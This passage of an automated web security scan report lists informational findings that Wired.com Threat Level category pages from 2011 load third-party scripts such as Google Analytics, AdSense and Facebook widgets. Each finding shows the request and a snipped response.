Path:	/threatlevel/category/elections/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/elections/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:12:57 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=263
Expires: Wed, 12 Jan 2011 15:34:13 GMT
Date: Wed, 12 Jan 2011 15:29:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.145. http://www.wired.com/threatlevel/category/fed-blotter/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/fed-blotter/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/fed-blotter/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:13:05 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=189
Expires: Wed, 12 Jan 2011 15:33:06 GMT
Date: Wed, 12 Jan 2011 15:29:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 123641

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.146. http://www.wired.com/threatlevel/category/glitches-and-bugs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/glitches-and-bugs/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/glitches-and-bugs/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:13:19 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=158
Expires: Wed, 12 Jan 2011 15:32:37 GMT
Date: Wed, 12 Jan 2011 15:29:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 118350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.147. http://www.wired.com/threatlevel/category/hacks-and-cracks/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/hacks-and-cracks/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/hacks-and-cracks/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

16.148. http://www.wired.com/threatlevel/category/hans-reiser-trial/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/hans-reiser-trial/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/hans-reiser-trial/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:13:41 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=250
Expires: Wed, 12 Jan 2011 15:34:18 GMT
Date: Wed, 12 Jan 2011 15:30:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 147168

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.149. http://www.wired.com/threatlevel/category/identification/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/identification/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/identification/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:13:49 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=188
Expires: Wed, 12 Jan 2011 15:33:24 GMT
Date: Wed, 12 Jan 2011 15:30:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 112563

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.150. http://www.wired.com/threatlevel/category/intellectual-property/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/intellectual-property/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/intellectual-property/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:14:03 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=213
Expires: Wed, 12 Jan 2011 15:33:52 GMT
Date: Wed, 12 Jan 2011 15:30:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 118261

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.151. http://www.wired.com/threatlevel/category/lori-drew-trial/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/lori-drew-trial/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/lori-drew-trial/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:14:09 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=98
Expires: Wed, 12 Jan 2011 15:32:12 GMT
Date: Wed, 12 Jan 2011 15:30:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.152. http://www.wired.com/threatlevel/category/network-neutrality/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/network-neutrality/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/network-neutrality/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:14:35 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=147
Expires: Wed, 12 Jan 2011 15:33:10 GMT
Date: Wed, 12 Jan 2011 15:30:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133997

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.153. http://www.wired.com/threatlevel/category/nsa/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/nsa/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/nsa/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:14:57 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=150
Expires: Wed, 12 Jan 2011 15:33:24 GMT
Date: Wed, 12 Jan 2011 15:30:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 128747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.154. http://www.wired.com/threatlevel/category/openleaks/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/openleaks/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/openleaks/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:15:12 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=139
Expires: Wed, 12 Jan 2011 15:33:18 GMT
Date: Wed, 12 Jan 2011 15:30:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 63460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.155. http://www.wired.com/threatlevel/category/politics/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/politics/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/politics/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:15:27 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=124
Expires: Wed, 12 Jan 2011 15:33:09 GMT
Date: Wed, 12 Jan 2011 15:31:05 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 112754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.156. http://www.wired.com/threatlevel/category/porn/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/porn/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/porn/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:30:57 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=174
Expires: Wed, 12 Jan 2011 15:34:06 GMT
Date: Wed, 12 Jan 2011 15:31:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 122702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.157. http://www.wired.com/threatlevel/category/privacy/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/privacy/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
